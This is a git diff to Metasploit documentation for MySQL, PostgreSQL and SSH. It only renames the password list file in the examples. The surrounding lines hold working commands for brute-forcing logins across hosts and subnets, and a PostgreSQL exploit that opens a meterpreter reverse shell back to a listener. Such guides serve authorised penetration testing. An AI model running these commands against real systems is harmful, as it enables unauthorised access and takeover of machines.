diff --git a/Metasploit-Guide-MySQL.md b/Metasploit-Guide-MySQL.md index b1631140af..2d213ffde9 100644 --- a/Metasploit-Guide-MySQL.md +++ b/Metasploit-Guide-MySQL.md @@ -42,14 +42,14 @@ Brute-force host with known user and password list: ``` use auxiliary/scanner/mysql/mysql_login -run mysql://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt +run mysql://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt ``` Brute-force credentials: ``` use auxiliary/scanner/mysql/mysql_login -run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt +run mysql://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt ``` Brute-force credentials in a subnet: @@ -57,7 +57,7 @@ Brute-force credentials in a subnet: ``` use auxiliary/scanner/mysql/mysql_login run cidr:/24:mysql://user:pass@192.168.222.0 threads=50 -run cidr:/24:mysql://user@192.168.222.0 threads=50 pass_file=./rockyou.txt +run cidr:/24:mysql://user@192.168.222.0 threads=50 pass_file=./wordlist.txt ``` ### MySQL Dumping diff --git a/Metasploit-Guide-PostgreSQL.md b/Metasploit-Guide-PostgreSQL.md index 434717fd2a..faf0299a7c 100644 --- a/Metasploit-Guide-PostgreSQL.md +++ b/Metasploit-Guide-PostgreSQL.md @@ -43,14 +43,14 @@ Brute-force host with known user and password list: ``` use auxiliary/scanner/postgres/postgres_login -run postgres://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt +run postgres://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt ``` Brute-force credentials: ``` use auxiliary/scanner/postgres/postgres_login -run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt +run postgres://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt ``` Brute-force credentials in a subnet: @@ -58,7 +58,7 @@ Brute-force credentials in a subnet: ``` use auxiliary/scanner/postgres/postgres_login run cidr:/24:postgres://user:pass@192.168.222.0 threads=50 -run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./rockyou.txt +run cidr:/24:postgres://user@192.168.222.0 threads=50 pass_file=./wordlist.txt ``` ### PostgreSQL Capture Server @@ -115,4 +115,4 @@ run 'postgres://user:this is my password@192.168.1.123/database_name' sql='selec ``` use exploit/linux/postgres/postgres_payload run postgres://postgres:password@192.168.123.6 lhost=192.168.123.1 lport=5000 payload=linux/x64/meterpreter/reverse_tcp target='Linux\ x86_64' -``` \ No newline at end of file +``` diff --git a/Metasploit-Guide-SSH.md b/Metasploit-Guide-SSH.md index 2824b00594..ace2a5550f 100644 --- a/Metasploit-Guide-SSH.md +++ b/Metasploit-Guide-SSH.md @@ -15,14 +15,14 @@ Brute-force host with known user and password list: ``` use scanner/ssh/ssh_login -run ssh://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt +run ssh://known_user@192.168.222.1 threads=50 pass_file=./wordlist.txt ``` Brute-force credentials: ``` use scanner/ssh/ssh_login -run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt +run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./wordlist.txt ``` Brute-force credentials in a subnet: @@ -30,7 +30,7 @@ Brute-force credentials in a subnet: ``` use scanner/ssh/ssh_login run cidr:/24:ssh://user:pass@192.168.222.0 threads=50 -run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt +run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./wordlist.txt ``` ### SSH Login